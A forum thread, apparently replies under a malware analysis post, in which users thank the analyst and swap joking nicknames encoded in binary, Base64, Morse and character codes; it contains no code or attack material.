Thanks for another analysis. Great as always.

 

[DardiM]

Thanks for another analysis. Great as always.

Thanks @AtlBo, happy you liked it

 

[askmark]

Yes, hahaha

I have now read part 2 and have to say your analysis and explanations just get better each time. I feel I learn so much when I read your posts. Thank you. Please keep the lessons coming!

 

[DardiM]

I have now read part 2 and have to say your analysis and explanations just get better each time. I feel I learn so much when I read your posts. Thank you. Please keep the lessons coming!

Thanks a lot

 

[Svoll]

I have now read part 2 and have to say your analysis and explanations just get better each time. I feel I learn so much when I read your posts. Thank you. Please keep the lessons coming!

I agree, Penguin has really step up his game in regards to his explanations and breakdowns, Bravo to the manchot!
Now if he can keep a certain penguin safe from always infecting himself, He would be PRO and over "9"000.

 

[DardiM]

I agree, Penguin has really step up his game in regards to his explanations and breakdowns, Bravo to the manchot!
Now if he can keep a certain penguin safe from always infecting himself, He would be PRO and over "9"000.

Bravo to the manchot
Merci !

And also thank you for your remarks, advices, in PM, to help me to improve my analysis posts

 

[Svoll]

Bravo to the manchot
Merci !

And also thank you for your remarks, advices, in PM, to help me to improve my analysis posts

thats evil, you just called me bad at computers cause i know nothing about it and have to ask you on PM! Bad Penguin

01010000 01100101 01101110 01100111 01110101 01101001 01101110 01000101 01111000 01110100 01100101 01110010 01101101 01101001 01101110 01100001 01110100 01101111 01110010

 

[DardiM]

thats evil, you just called me bad at computers cause i know nothing about it and have to ask you on PM! Bad Penguin

01010000 01100101 01101110 01100111 01110101 01101001 01101110 01000101 01111000 01110100 01100101 01110010 01101101 01101001 01101110 01100001 01110100 01101111 01110010

=> I like your signature : "PenguinExterminator"
=> you really help to improve my posts, don't you remember your advises to make my post more clear, understandable ?
=> shy Svoll that doesn't want people know he helps people (even Penguin/Manchots) !

=> U3ZvbGxhcmRpTQ==

 

[Svoll]

you are too kind, I didn't do anything, in fact you are the one who is coaching me on malware testing and preparing me to do sample testing on the HUB, for that I thank you!

-. --- --..-- / .. - ... / .--. . -. --. ..- .. -. . -..- - . .-. -- .. -. .- - --- .-. --..-- / -. --- - / ... ...- --- .-.. .-.. .- .-. -.. .. --

or maybe :

80 101 110 103 117 105 110 84 114 97 105 110 101 101

 

[DardiM]

Just the decoded part for everybody understand

U3ZvbGxhcmRpTQ==
=> SvollardiM

you are too kind, I didn't do anything, in fact you are the one who is coaching me on malware testing and preparing me to do sample testing on the HUB, for that I thank you!

-. --- --..-- / .. - ... / .--. . -. --. ..- .. -. . -..- - . .-. -- .. -. .- - --- .-. --..-- / -. --- - / ... ...- --- .-.. .-.. .- .-. -.. .. --

or maybe :

80 101 110 103 117 105 110 84 114 97 105 110 101 101

NO, ITS PENGUINEXTERMINATOR, NOT SVOLLARDIM
or maybe :
PenguinTrainee

 

[Svoll]

I think I just derailed your awesome analysis post, sorry everyone!